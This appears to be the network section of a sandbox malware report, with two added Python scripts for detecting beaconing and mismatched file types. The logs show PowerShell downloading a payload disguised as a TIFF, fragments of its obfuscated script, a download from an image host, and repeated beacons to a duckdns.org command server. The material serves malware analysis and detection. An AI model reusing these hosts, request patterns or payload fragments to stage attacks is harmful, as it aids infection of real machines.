Dec 17, 2024 07:25:52.652089119 CET  2430      50004     192.169.69.26  192.168.2.6
                                                                                                          Dec 17, 2024 07:25:53.547576904 CET500052430192.168.2.6192.169.69.26
                                                                                                          Dec 17, 2024 07:25:53.667759895 CET243050005192.169.69.26192.168.2.6
                                                                                                          Dec 17, 2024 07:25:53.668185949 CET500052430192.168.2.6192.169.69.26
                                                                                                          Dec 17, 2024 07:25:53.672395945 CET500052430192.168.2.6192.169.69.26
                                                                                                          Dec 17, 2024 07:25:53.792830944 CET243050005192.169.69.26192.168.2.6
                                                                                                          Dec 17, 2024 07:26:04.033997059 CET243050005192.169.69.26192.168.2.6
                                                                                                          Dec 17, 2024 07:26:04.034079075 CET500052430192.168.2.6192.169.69.26
Timestamp | Source Port | Dest Port | Source IP | Dest IP
Dec 17, 2024 07:22:09.204142094 CET | 64744 | 53 | 192.168.2.6 | 1.1.1.1
Dec 17, 2024 07:22:09.501827002 CET | 53 | 64744 | 1.1.1.1 | 192.168.2.6
Dec 17, 2024 07:22:32.128817081 CET | 64004 | 53 | 192.168.2.6 | 1.1.1.1
Dec 17, 2024 07:22:32.266026974 CET | 53 | 64004 | 1.1.1.1 | 192.168.2.6
Dec 17, 2024 07:22:35.857935905 CET | 65142 | 53 | 192.168.2.6 | 1.1.1.1
Dec 17, 2024 07:22:36.163908958 CET | 53 | 65142 | 1.1.1.1 | 192.168.2.6
Dec 17, 2024 07:23:45.750161886 CET | 63877 | 53 | 192.168.2.6 | 1.1.1.1
Dec 17, 2024 07:23:46.091425896 CET | 53 | 63877 | 1.1.1.1 | 192.168.2.6
Dec 17, 2024 07:24:55.406508923 CET | 54870 | 53 | 192.168.2.6 | 1.1.1.1
Dec 17, 2024 07:24:55.743204117 CET | 53 | 54870 | 1.1.1.1 | 192.168.2.6
Timestamp | Source IP | Dest IP | Trans ID | OP Code | Name | Type | Class | DNS over HTTPS
Dec 17, 2024 07:22:09.204142094 CET | 192.168.2.6 | 1.1.1.1 | 0xea36 | Standard query (0) | res.cloudinary.com | A (IP address) | IN (0x0001) | false
Dec 17, 2024 07:22:32.128817081 CET | 192.168.2.6 | 1.1.1.1 | 0x805d | Standard query (0) | paste.ee | A (IP address) | IN (0x0001) | false
Dec 17, 2024 07:22:35.857935905 CET | 192.168.2.6 | 1.1.1.1 | 0xdc79 | Standard query (0) | kiolokgangan.duckdns.org | A (IP address) | IN (0x0001) | false
Dec 17, 2024 07:23:45.750161886 CET | 192.168.2.6 | 1.1.1.1 | 0x8735 | Standard query (0) | kiolokgangan.duckdns.org | A (IP address) | IN (0x0001) | false
Dec 17, 2024 07:24:55.406508923 CET | 192.168.2.6 | 1.1.1.1 | 0x7f24 | Standard query (0) | kiolokgangan.duckdns.org | A (IP address) | IN (0x0001) | false
Timestamp | Source IP | Dest IP | Trans ID | Reply Code | Name | CName | Address | Type | Class | DNS over HTTPS
Dec 17, 2024 07:22:09.501827002 CET | 1.1.1.1 | 192.168.2.6 | 0xea36 | No error (0) | res.cloudinary.com | cloudinary.map.fastly.net | - | CNAME (Canonical name) | IN (0x0001) | false
Dec 17, 2024 07:22:09.501827002 CET | 1.1.1.1 | 192.168.2.6 | 0xea36 | No error (0) | cloudinary.map.fastly.net | - | 151.101.1.137 | A (IP address) | IN (0x0001) | false
Dec 17, 2024 07:22:09.501827002 CET | 1.1.1.1 | 192.168.2.6 | 0xea36 | No error (0) | cloudinary.map.fastly.net | - | 151.101.65.137 | A (IP address) | IN (0x0001) | false
Dec 17, 2024 07:22:09.501827002 CET | 1.1.1.1 | 192.168.2.6 | 0xea36 | No error (0) | cloudinary.map.fastly.net | - | 151.101.129.137 | A (IP address) | IN (0x0001) | false
Dec 17, 2024 07:22:09.501827002 CET | 1.1.1.1 | 192.168.2.6 | 0xea36 | No error (0) | cloudinary.map.fastly.net | - | 151.101.193.137 | A (IP address) | IN (0x0001) | false
Dec 17, 2024 07:22:32.266026974 CET | 1.1.1.1 | 192.168.2.6 | 0x805d | No error (0) | paste.ee | - | 104.21.84.67 | A (IP address) | IN (0x0001) | false
Dec 17, 2024 07:22:32.266026974 CET | 1.1.1.1 | 192.168.2.6 | 0x805d | No error (0) | paste.ee | - | 172.67.187.200 | A (IP address) | IN (0x0001) | false
Dec 17, 2024 07:22:36.163908958 CET | 1.1.1.1 | 192.168.2.6 | 0xdc79 | No error (0) | kiolokgangan.duckdns.org | - | 192.169.69.26 | A (IP address) | IN (0x0001) | false
Dec 17, 2024 07:23:46.091425896 CET | 1.1.1.1 | 192.168.2.6 | 0x8735 | No error (0) | kiolokgangan.duckdns.org | - | 192.169.69.26 | A (IP address) | IN (0x0001) | false
Dec 17, 2024 07:24:55.743204117 CET | 1.1.1.1 | 192.168.2.6 | 0x7f24 | No error (0) | kiolokgangan.duckdns.org | - | 192.169.69.26 | A (IP address) | IN (0x0001) | false
• res.cloudinary.com
• paste.ee
• 74.208.80.248
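The TCP rows above show the sandbox host opening a fresh connection to 192.169.69.26:2430 roughly every eleven and a half seconds, and the DNS tables show that address is what kiolokgangan.duckdns.org resolved to. The script below is an added triage example, not Joe Sandbox code: it parses a subset of rows copied from the tables, measures the gap between flow starts per client source port, and labels the server address with the names the report resolved to it. The dynamic-DNS suffixes other than duckdns.org, and the thresholds in triage(), are assumptions.

```python
"""Beacon timing and DNS correlation over rows copied from this report.
Added example for triage; it is not Joe Sandbox code and the DDNS suffix
list beyond duckdns.org is an assumption."""
import re
import statistics
from datetime import datetime
from typing import Dict, List, Tuple

# Subset of the report's TCP table: client 192.168.2.6 talking to 192.169.69.26:2430.
# Each flow uses a fresh source port, so the first packet per port is the flow start.
TCP_ROWS = """
Dec 17, 2024 07:25:18.860223055 CET 50001 2430 192.168.2.6 192.169.69.26
Dec 17, 2024 07:25:18.980011940 CET 2430 50001 192.169.69.26 192.168.2.6
Dec 17, 2024 07:25:29.400872946 CET 50001 2430 192.168.2.6 192.169.69.26
Dec 17, 2024 07:25:30.422470093 CET 50003 2430 192.168.2.6 192.169.69.26
Dec 17, 2024 07:25:30.542373896 CET 50003 2430 192.168.2.6 192.169.69.26
Dec 17, 2024 07:25:41.906831026 CET 50004 2430 192.168.2.6 192.169.69.26
Dec 17, 2024 07:25:42.028697968 CET 50004 2430 192.168.2.6 192.169.69.26
Dec 17, 2024 07:25:53.547576904 CET 50005 2430 192.168.2.6 192.169.69.26
Dec 17, 2024 07:25:53.668185949 CET 50005 2430 192.168.2.6 192.169.69.26
"""

# (name, address) pairs copied from the report's DNS answer table.
DNS_A_ROWS = [
    ("cloudinary.map.fastly.net", "151.101.1.137"),
    ("paste.ee", "104.21.84.67"),
    ("paste.ee", "172.67.187.200"),
    ("kiolokgangan.duckdns.org", "192.169.69.26"),
]

# duckdns.org is the provider seen in this report; the other two are an
# assumption and should come from your own threat-intel list in practice.
DDNS_SUFFIXES = (".duckdns.org", ".no-ip.org", ".ddns.net")

ROW_RE = re.compile(
    r"^(?P<ts>\w{3} \d{1,2}, \d{4} \d{2}:\d{2}:\d{2}\.\d+) \w+ "
    r"(?P<sport>\d+) (?P<dport>\d+) (?P<sip>[\d.]+) (?P<dip>[\d.]+)$"
)


def parse_ts(ts: str) -> datetime:
    """The report prints nanoseconds; strptime's %f accepts at most six digits."""
    head, frac = ts.rsplit(".", 1)
    return datetime.strptime(f"{head}.{frac[:6]}", "%b %d, %Y %H:%M:%S.%f")


def flow_starts(rows: str, client: str, server: str) -> List[Tuple[int, datetime]]:
    """First packet seen per client source port toward the server, in time order."""
    first: Dict[int, datetime] = {}
    for line in rows.strip().splitlines():
        m = ROW_RE.match(line)
        if not m or m["sip"] != client or m["dip"] != server:
            continue
        first.setdefault(int(m["sport"]), parse_ts(m["ts"]))
    return sorted(first.items(), key=lambda kv: kv[1])


def beacon_stats(rows: str, client: str, server: str) -> dict:
    """Mean gap between flow starts and the spread (max - min) of those gaps."""
    starts = [ts for _, ts in flow_starts(rows, client, server)]
    gaps = [(b - a).total_seconds() for a, b in zip(starts, starts[1:])]
    if len(gaps) < 2:  # too few connections to say anything about periodicity
        return {"flows": len(starts), "mean_gap": None, "jitter": None}
    return {"flows": len(starts),
            "mean_gap": statistics.mean(gaps),
            "jitter": max(gaps) - min(gaps)}


def label_ip(ip: str) -> dict:
    """Names the report resolved to this address, and whether any is dynamic DNS."""
    names = sorted({n for n, a in DNS_A_ROWS if a == ip})
    return {"ip": ip, "names": names,
            "ddns": any(n.endswith(DDNS_SUFFIXES) for n in names)}


def triage(rows: str, client: str, server: str) -> dict:
    out = {**label_ip(server), **beacon_stats(rows, client, server)}
    # Flag when a dynamic-DNS name gets regular reconnects with low spread.
    # Thresholds are an assumption tuned to this sample, not a universal rule.
    out["suspicious"] = bool(out["ddns"] and out["flows"] >= 3
                             and out["jitter"] is not None and out["jitter"] < 1.0)
    return out


if __name__ == "__main__":
    print(triage(TCP_ROWS, "192.168.2.6", "192.169.69.26"))
```

Four flows is a thin sample; on a full capture, feed every client-initiated flow to the same function and look at the whole gap distribution rather than the mean alone. The source-port counter skipping 50002 is visible in the rows and is not explained by the table; do not read anything into it without the rest of the capture.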
Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
0 | 192.168.2.6 | 49707 | 74.208.80.248 | 80 | 1776 | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
Timestamp | Bytes transferred | Direction | Data
Dec 17, 2024 07:22:03.015948057 CET | 331 | OUT | GET /43/seewhatiamdoingforyouwithgreatnessthingsgivenmeback.tIF HTTP/1.1
Accept: */*
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)
Host: 74.208.80.248
Connection: Keep-Alive
Dec 17, 2024 07:22:04.164150000 CET | 1236 | IN | HTTP/1.1 200 OK
Date: Tue, 17 Dec 2024 06:22:03 GMT
Server: Apache/2.4.58 (Win64) OpenSSL/3.1.3 PHP/8.2.12
Last-Modified: Mon, 16 Dec 2024 11:35:21 GMT
ETag: "259f8-6296193639488"
Accept-Ranges: bytes
Content-Length: 154104
Keep-Alive: timeout=5, max=100
Connection: Keep-Alive
Content-Type: image/tiff
Data Raw: ff fe 0d 00 0a 00 20 00 20 00 20 00 20 00 0d 00 0a 00 5a 00 4c 00 47 00 4e 00 68 00 4e 00 6c 00 67 00 4b 00 70 00 69 00 68 00 52 00 62 00 6f 00 20 00 3d 00 20 00 22 00 63 00 41 00 6d 00 63 00 47 00 66 00 71 00 6b 00 68 00 55 00 4a 00 4a 00 75 00 64 00 74 00 22 00 0d 00 0a 00 4c 00 4b 00 47 00 4c 00 68 00 6b 00 4b 00 4c 00 47 00 68 00 4c 00 66 00 69 00 69 00 6a 00 20 00 3d 00 20 00 22 00 69 00 4c 00 43 00 6d 00 70 00 5a 00 5a 00 6d 00 70 00 51 00 75 00 4b 00 67 00 50 00 65 00 22 00 0d 00 0a 00 63 00 49 00 4c 00 42 00 4b 00 63 00 6d 00 4a 00 4b 00 65 00 64 00 5a 00 6b 00 64 00 55 00 20 00 3d 00 20 00 22 00 4b 00 4e 00 57 00 47 00 66 00 57 00 63 00 6d 00 74 00 5a 00 6b 00 6e 00 66 00 69 00 4c 00 22 00 0d 00 0a 00 0d 00 0a 00 47 00 69 00 6c 00 50 00 5a 00 63 00 65 00 62 00 62 00 7a 00 6c 00 50 00 4b 00 68 00 66 00 20 00 3d 00 20 00 22 00 52 00 7a 00 68 00 4b 00 4f 00 68 00 50 00 6a 00 53 00 47 00 57 00 69 00 63 00 63 00 57 00 22 00 0d 00 0a 00 63 00 4e 00 6d 00 64 00 78 00 6c 00 65 00 57 00 66 00 70 00 [TRUNCATED]
Data Ascii: ZLGNhNlgKpihRbo = "cAmcGfqkhUJJudt"LKGLhkKLGhLfiij = "iLCmpZZmpQuKgPe"cILBKcmJKedZkdU = "KNWGfWcmtZknfiL"GilPZcebbzlPKhf = "RzhKOhPjSGWiccW"cNmdxleWfpLhGOp = "sAWGLmzALmzWmAp"oKNnlGHdBxnqAlC = "xjAzKjiGZKbpjqc"AtNRchmcnJHGzic = "LhcZpJKxBWcAcBr"ckLmKaptAcZhpGW = "ebkKWmAGtWOAPLL"iCLAWWWPRGTGcUi = "iWmWdaUPfKKxacN"LoIppqkhLJfhCiL = "UNLdWJNrsLkARmg"hGNaWCmULiLWNLQ = "keeeLmLWLzobGAU"UzihczZWeINiWlP = "CUdipWLkvcRWakg"KPLbPo
Dec 17, 2024 07:22:04.164254904 CET | 224 | IN | Data Raw: 00 4f 00 4e 00 54 00 6f 00 43 00 4b 00 70 00 4b 00 57 00 20 00 3d 00 20 00 22 00 73 00 66 00 6e 00 6b 00 48 00 62 00 47 00 52 00 6d 00 6b 00 4b 00 4f 00 66 00 47 00 48 00 22 00 0d 00 0a 00 4c 00 6c 00 67 00 57 00 50 00 42 00 6b 00 4c 00 4c 00 6e
Data Ascii: ONToCKpKW = "sfnkHbGRmkKOfGH"LlgWPBkLLnfrIGu = "GvictpRNLoZCnzK"PAWLqPqRdPmipfG = "civPLmTiOOozmef"KokLO
Dec 17, 2024 07:22:04.164268970 CET | 1236 | IN | Data Raw: 00 6a 00 4b 00 55 00 71 00 50 00 5a 00 78 00 43 00 4a 00 7a 00 20 00 3d 00 20 00 22 00 4f 00 42 00 4e 00 6b 00 4c 00 51 00 65 00 5a 00 4c 00 74 00 57 00 76 00 47 00 4c 00 47 00 22 00 0d 00 0a 00 4b 00 73 00 66 00 71 00 62 00 62 00 4c 00 65 00 41
Data Ascii: jKUqPZxCJz = "OBNkLQeZLtWvGLG"KsfqbbLeAGWkKob = "LQZmxcdcgBGeAoh"LWdWLtknblWTZLZ = "hsUPnlfhWkjHciQ"tLKgjNQjxKSxHNe
Dec 17, 2024 07:22:04.164294004 CET | 1236 | IN | Data Raw: 00 4f 00 64 00 4c 00 6d 00 57 00 22 00 0d 00 0a 00 63 00 4a 00 70 00 62 00 52 00 70 00 50 00 62 00 57 00 47 00 4f 00 7a 00 4c 00 65 00 69 00 20 00 3d 00 20 00 22 00 4b 00 6c 00 62 00 6f 00 65 00 42 00 64 00 54 00 4f 00 69 00 4c 00 51 00 55 00 68
Data Ascii: OdLmW"cJpbRpPbWGOzLei = "KlboeBdTOiLQUhW"LpAJWchNLchvoIh = "bkcLNmWRpmLfxak"LcGjKkbZWfLNOBQ = "LLLtOcWzhBNxuWW"
Dec 17, 2024 07:22:04.164309978 CET | 1236 | IN | Data Raw: 00 6f 00 20 00 3d 00 20 00 22 00 4c 00 63 00 73 00 66 00 57 00 5a 00 4a 00 65 00 55 00 47 00 69 00 62 00 6f 00 78 00 61 00 22 00 0d 00 0a 00 4e 00 57 00 6b 00 4c 00 4b 00 6e 00 65 00 69 00 7a 00 68 00 4b 00 4c 00 4b 00 4b 00 6d 00 20 00 3d 00 20
Data Ascii: o = "LcsfWZJeUGiboxa"NWkLKneizhKLKKm = "UUkcCkirzviLPLW"GiuxatpPLUckZGW = "KJhqCfkdUcbQitL"PmPipGWpmBqCedo = "WceGc
Dec 17, 2024 07:22:04.164416075 CET | 1236 | IN | Data Raw: 00 0a 00 6a 00 4b 00 47 00 57 00 6c 00 63 00 69 00 47 00 61 00 4c 00 5a 00 70 00 65 00 6c 00 70 00 20 00 3d 00 20 00 22 00 5a 00 57 00 4c 00 54 00 57 00 49 00 4c 00 41 00 57 00 69 00 41 00 5a 00 4c 00 75 00 64 00 22 00 0d 00 0a 00 4c 00 6a 00 4c
Data Ascii: jKGWlciGaLZpelp = "ZWLTWILAWiAZLud"LjLGkRbcQWbOWtG = "hWBZaAfknLORqck"cvJPKkWRbvkuUtP = "ULWoWZWUhpJRbos"KKmKhudoK
Dec 17, 2024 07:22:04.164439917 CET | 1236 | IN | Data Raw: 00 69 00 7a 00 4c 00 78 00 64 00 4b 00 6a 00 47 00 6c 00 6d 00 4c 00 22 00 0d 00 0a 00 51 00 6b 00 55 00 50 00 64 00 6b 00 6e 00 61 00 69 00 5a 00 53 00 4b 00 41 00 4c 00 68 00 20 00 3d 00 20 00 22 00 5a 00 47 00 47 00 6f 00 41 00 41 00 55 00 41
Data Ascii: izLxdKjGlmL"QkUPdknaiZSKALh = "ZGGoAAUAOpLKKee"GKimxNZAPUAkSWu = "LzRkeWGLWkNlmca"oALSPWqPbckzRoG = "UaLCHeaLKNtr
Dec 17, 2024 07:22:04.164455891 CET | 1236 | IN | Data Raw: 00 4f 00 43 00 4f 00 6f 00 66 00 4e 00 75 00 20 00 3d 00 20 00 22 00 6f 00 62 00 50 00 68 00 69 00 51 00 6c 00 6c 00 66 00 4b 00 61 00 4c 00 55 00 5a 00 75 00 22 00 0d 00 0a 00 4c 00 6d 00 76 00 42 00 5a 00 4b 00 4b 00 47 00 7a 00 7a 00 50 00 6d
Data Ascii: OCOofNu = "obPhiQllfKaLUZu"LmvBZKKGzzPmPoZ = "WCcNGAskLljtpUp"RpUfWkKiBcioWcf = "jOLISzRSHRhGjLU"PhhmQLvbkmIhGfW =
Dec 17, 2024 07:22:04.164469957 CET | 1236 | IN | Data Raw: 00 41 00 54 00 66 00 4b 00 22 00 0d 00 0a 00 4f 00 69 00 57 00 76 00 65 00 62 00 78 00 74 00 42 00 55 00 4f 00 6d 00 63 00 4b 00 6b 00 20 00 3d 00 20 00 22 00 4c 00 71 00 6b 00 69 00 57 00 70 00 57 00 5a 00 4c 00 4c 00 4e 00 69 00 4c 00 63 00 4b
Data Ascii: ATfK"OiWvebxtBUOmcKk = "LqkiWpWZLLNiLcK"TtmqWbLzcbiaoWl = "BLWLnWHLAqfbllz"lKncPNLmOpkLfkc = "iBWbaiCaiZhWcuo"iWt
Dec 17, 2024 07:22:04.164485931 CET | 1236 | IN | Data Raw: 00 20 00 22 00 69 00 42 00 4c 00 4e 00 62 00 43 00 47 00 4e 00 4c 00 67 00 70 00 50 00 54 00 62 00 47 00 22 00 0d 00 0a 00 7a 00 5a 00 66 00 4b 00 50 00 4b 00 4c 00 4b 00 73 00 4f 00 51 00 4e 00 4b 00 41 00 70 00 20 00 3d 00 20 00 22 00 4c 00 6c
Data Ascii: "iBLNbCGNLgpPTbG"zZfKPKLKsOQNKAp = "LlNGWokRqfULLKk"LOuWWqpTWiLLKIp = "KjKoJKLmuAZiGmN"gNnpLoPWpiGdczG = "klCLGG
Dec 17, 2024 07:22:04.284645081 CET | 1236 | IN | Data Raw: 00 42 00 7a 00 42 00 66 00 6a 00 74 00 63 00 5a 00 48 00 4a 00 4a 00 54 00 7a 00 20 00 3d 00 20 00 22 00 41 00 42 00 4b 00 6f 00 68 00 4e 00 64 00 52 00 74 00 63 00 4b 00 4c 00 61 00 41 00 6d 00 22 00 0d 00 0a 00 50 00 78 00 41 00 6b 00 5a 00 6b
Data Ascii: BzBfjtcZHJJTz = "ABKohNdRtcKLaAm"PxAkZkKQAAzGBPa = "ccBUpPLTdWihbIk"ZGdZcWCaWbGiesH = "bihuRLucqjAUPls"ObUghuKKUKPK
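The session above is the point a detection engineer would want to automate: powershell.exe (PID 1776) requests a ".tIF" path with a browser-looking User-Agent, the server answers with Content-Type: image/tiff, yet the body opens with the bytes ff fe (a UTF-16LE byte-order mark) and the Data Ascii column reads as lines of `name = "value"` padding, not TIFF image data. The check below is an added example, not Joe Sandbox code: it sniffs the leading bytes, compares them against the declared type, and decodes text bodies. The byte samples are the leading bytes of this response and of the res.cloudinary.com JPEG response later in the report; the magic-number table is my own short list, not a complete one.

```python
"""Declared-vs-actual body check for the two HTTP responses in this report.
Added example, not Joe Sandbox code. The byte strings are the leading bytes
of each response body as printed in the report's Data Raw rows."""
import re
from typing import List, Optional, Tuple

# 74.208.80.248 response: Content-Type: image/tiff, but the body opens with a
# UTF-16LE byte-order mark followed by script-like text.
TIF_BODY = bytes.fromhex(
    "ff fe 0d 00 0a 00 20 00 20 00 20 00 20 00 0d 00 0a 00 5a 00 4c 00 47 00 4e 00 "
    "68 00 4e 00 6c 00 67 00 4b 00 70 00 69 00 68 00 52 00 62 00 6f 00 20 00 3d 00 "
    "20 00 22 00 63 00 41 00 6d 00 63 00 47 00 66 00 71 00 6b 00 68 00 55 00 4a 00 "
    "4a 00 75 00 64 00 74 00 22 00 0d 00 0a 00"
)
# res.cloudinary.com response: Content-Type: image/jpeg, body is a JFIF header.
JPEG_BODY = bytes.fromhex("ff d8 ff e0 00 10 4a 46 49 46 00 01 01 00 00 01 00 01 00 00")

# Magic numbers this check knows about (a short list, extend as needed).
MAGIC: List[Tuple[str, Tuple[bytes, ...]]] = [
    ("image/tiff", (b"II*\x00", b"MM\x00*")),
    ("image/jpeg", (b"\xff\xd8\xff",)),
    ("image/png", (b"\x89PNG\r\n\x1a\n",)),
    ("application/x-msdownload", (b"MZ",)),
]
ASSIGN_RE = re.compile(r'^\s*(\w+)\s*=\s*"([^"]*)"\s*$', re.M)


def sniff(body: bytes) -> str:
    """Type by leading bytes, ignoring whatever the server declared."""
    for mime, magics in MAGIC:
        if body.startswith(magics):
            return mime
    if body.startswith((b"\xff\xfe", b"\xfe\xff")):
        return "text/plain; charset=utf-16"
    printable = sum(32 <= b < 127 or b in b"\r\n\t" for b in body)
    if body and printable / len(body) > 0.9:
        return "text/plain"
    return "application/octet-stream"


def decode_text(body: bytes) -> Optional[str]:
    """Text of a body that sniffs as text; None for genuine binaries."""
    kind = sniff(body)
    if kind.startswith("text/plain; charset=utf-16"):
        return body.decode("utf-16")  # the codec honours and strips the BOM
    if kind == "text/plain":
        return body.decode("latin-1")
    return None


def _base(mime: str) -> str:
    return mime.split(";")[0].strip().lower()


def check(declared: str, body: bytes) -> dict:
    """Compare the Content-Type header with what the bytes say."""
    sniffed = sniff(body)
    return {"declared": declared, "sniffed": sniffed,
            "mismatch": _base(declared) != _base(sniffed)}


def script_assignments(text: str) -> List[Tuple[str, str]]:
    """name = "value" lines, the padding pattern visible in the Data Ascii rows."""
    return ASSIGN_RE.findall(text)


if __name__ == "__main__":
    for declared, body in (("image/tiff", TIF_BODY), ("image/jpeg", JPEG_BODY)):
        print(check(declared, body), script_assignments(decode_text(body) or ""))
```

A matching magic number only says the body starts like the declared type; it does not clear the cloudinary JPEG, which still has to be examined for whatever the PowerShell stage does with it. The mismatch check is cheap enough to run on every response a scripting host fetches, which is where it pays off.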


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
0 | 192.168.2.6 | 49715 | 151.101.1.137 | 443 | 5924 | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
Timestamp | Bytes transferred | Direction | Data
2024-12-17 06:22:10 UTC | 127 | OUT | GET /dzvai86uh/image/upload/v1734050991/unxaooiykxfmw9pan4z1.jpg HTTP/1.1
Host: res.cloudinary.com
Connection: Keep-Alive
2024-12-17 06:22:11 UTC | 780 | IN | HTTP/1.1 200 OK
Connection: close
Content-Length: 2469849
Content-Type: image/jpeg
Etag: "78bd258abedd7787714b5d9c33eb9212"
Last-Modified: Fri, 13 Dec 2024 00:49:52 GMT
Date: Tue, 17 Dec 2024 06:22:11 GMT
Strict-Transport-Security: max-age=604800
Cache-Control: public, no-transform, immutable, max-age=2592000
Server-Timing: cld-fastly;dur=2;cpu=1;start=2024-12-17T06:22:11.009Z;desc=hit,rtt;dur=174,content-info;desc="width=1920,height=1080,bytes=2469849,format=\"jpg\",o=1,crt=1734050991,ef=(17)"
Server: Cloudinary
Timing-Allow-Origin: *
Access-Control-Allow-Origin: *
Accept-Ranges: bytes
X-Content-Type-Options: nosniff
Access-Control-Expose-Headers: Content-Length,ETag,Server-Timing,X-Content-Type-Options
x-request-id: fdecdd9b808625f2ef998baba5084d1b
2024-12-17 06:22:11 UTC | 1378 | IN | Data Raw: ff d8 ff e0 00 10 4a 46 49 46 00 01 01 00 00 01 00 01 00 00 ff db 00 43 00 08 06 06 07 06 05 08 07 07 07 09 09 08 0a 0c 14 0d 0c 0b 0b 0c 19 12 13 0f 14 1d 1a 1f 1e 1d 1a 1c 1c 20 24 2e 27 20 22 2c 23 1c 1c 28 37 29 2c 30 31 34 34 34 1f 27 39 3d 38 32 3c 2e 33 34 32 ff db 00 43 01 09 09 09 0c 0b 0c 18 0d 0d 18 32 21 1c 21 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 ff c0 00 11 08 04 38 07 80 03 01 22 00 02 11 01 03 11 01 ff c4 00 1c 00 00 02 03 01 01 01 01 00 00 00 00 00 00 00 00 00 03 04 01 02 05 00 06 07 08 ff c4 00 55 10 00 02 02 01 03 02 04 03 05 06 03 05 06 02 01 15 01 02 03 11 00 04 12 21 31 41 05 13 22 51 61 71 81 06 14 32 91 a1 07 23 42 b1 c1
Data Ascii: JFIFC $.' ",#(7),01444'9=82<.342C2!!222222222222222222222222222222222222222222222222228"U!1A"Qaq2#B
2024-12-17 06:22:11 UTC | 1378 | IN | Data Raw: 77 24 91 80 f7 ed aa 38 13 c5 74 2e 92 f9 a4 19 c0 50 c1 95 13 cc f4 aa d7 4f e2 f4 f6 cf 9a 34 12 6a 34 d1 ac 34 c0 35 95 3d b3 e9 ff 00 b5 df 0d 9e 5f 16 d1 c2 37 3c 8c ae 62 55 46 b2 4b 70 2d 85 9e 48 cf 03 04 29 1a 02 c8 cb 27 e1 22 e8 8f 87 f3 c0 63 45 08 87 48 b1 94 0b b9 a8 91 99 9a b8 22 87 5d 10 0c cd 1b b7 a8 92 00 02 e8 d6 6a e9 8a 5b 07 65 52 c0 a8 46 37 fa 62 5a 9d 3c 47 59 18 29 b4 1d c3 d2 47 3f 4c 09 9f 4f a7 74 d3 90 78 2c c0 37 bf 3c 73 8a 10 92 a8 46 da b2 2c 8a a8 77 71 9b 83 4e 8f 0a 82 ab ed c1 ac ce 7f 04 8d 35 22 50 e5 08 6b aa b1 81 68 b5 2c ec eb e5 80 55 14 32 31 a5 53 75 63 e7 97 d6 cd 1e a2 6d 36 91 ee de 4f 55 76 14 79 07 0b 2b 22 ef 72 88 c0 2f a9 8a 8e 6b 31 f4 8c da ed 7c d2 10 5c 85 3b 2c d5 0a 23 a6 06 b8 8b 6f 90 b0 bc
Data Ascii: w$8t.PO4j445=_7<bUFKp-H)'"cEH"]j[eRF7bZ<GY)G?LOtx,7<sF,wqN5"Pkh,U21Sucm6OUvy+"r/k1|\;,#o
2024-12-17 06:22:11 UTC | 1378 | IN | Data Raw: 8c cd 80 06 22 88 00 fb 74 c5 c6 89 f4 fe 2d 26 ab ef 2f e5 b0 1e 8a 15 d3 03 7b ef a3 82 6d 4f 7c 20 f1 02 0b 6d 76 25 85 73 99 62 5f 34 d8 1c 7b e1 83 10 a3 8a b3 d7 01 8d 66 a0 49 0c 6a 5b 68 dc c7 75 e1 74 7a 92 cc 1f 71 de be 96 e6 f7 0f 7c c8 f1 3d 3b 6a 61 8e 38 e5 68 88 53 ea 51 cd e4 69 8b 69 b6 02 ec e5 68 59 ea 78 eb 81 ea 25 9c b2 90 2b 69 19 91 39 68 a6 8e 4d 96 a1 83 30 63 c6 30 9a 85 d8 ac 59 55 5b 81 67 92 71 2f 14 95 e6 85 a2 86 89 65 2a 6b b5 e0 6a 45 e2 ed 26 a4 45 1f aa 31 d4 a9 e0 1f 6c cd 97 c4 4b c9 2b 9e 77 31 20 fd 71 4d 32 2f 84 e8 00 6d cc e7 80 7b 9f 8e 27 14 ca fc 0f c3 cf 24 60 3a 67 91 e4 34 0b 1a be b9 07 54 77 8b e0 11 ef df 04 93 a2 2b 51 f5 1e 2b e1 99 7a 9d 2e ac 78 92 ce 35 2d f7 72 2b cb a1 5f 3c 0d 4d 46 b0 24 43 7b
Data Ascii: "t-&/{mO| mv%sb_4{fIj[hutzq|=;ja8hSQiihYx%+i9hM0c0YU[gq/e*kjE&E1lK+w1 qM2/m{'$`:g4Tw+Q+z.x5-r+_<MF$C{
2024-12-17 06:22:11 UTC | 1378 | IN | Data Raw: 66 6d 4b f8 66 a7 61 05 96 26 b5 23 f1 70 73 f3 be ae 35 fb ac f2 15 01 99 ef 9e a3 9e d9 f5 ef 18 fb 5d a0 0b 26 92 09 a3 77 64 65 26 fe 07 fe bf ae 7c 9f 57 2c 6f e1 f2 21 70 ae ac 0d 7b e0 62 6c 20 6e 07 80 31 dd 33 bb 44 39 b3 7c 83 8a 79 8d b8 86 e0 1e 31 9d 15 14 65 07 a6 03 88 18 2d 95 5e 72 e2 32 ca 6d 45 1c ac a8 16 35 3b e8 8c a9 d4 24 41 44 8e 59 8f 4e 0e 01 3c b5 58 f6 8b 5a 3c 57 4c 80 be e2 fe 63 38 92 e0 90 f4 3a d6 5c be c4 0e ce 02 81 f9 e0 42 26 e0 56 94 1f 6c 23 82 aa 2d 54 0d c4 8f 8e 29 06 b5 25 76 51 e8 3d af be 32 1d 5c 6d 2c 09 1d f0 0f 13 72 3a 7d 71 b5 72 07 52 7e 03 33 d0 d6 da 3c f7 c6 44 6b d2 46 56 37 55 7d 0e 01 0c 8f 24 8a 63 ba f6 03 bf b6 3a 74 d3 3c 51 3c 60 33 49 b7 d3 e9 0c 2f a1 da 1b 77 36 39 34 39 1e f9 5d 14 f0 e9
Data Ascii: fmKfa&#ps5]&wde&|W,o!p{bl n13D9|y1e-^r2mE5;$ADYN<XZ<WLc8:\B&Vl#-T)%vQ=2\m,r:}qrR~3<DkFV7U}$c:t<Q<`3I/w6949]
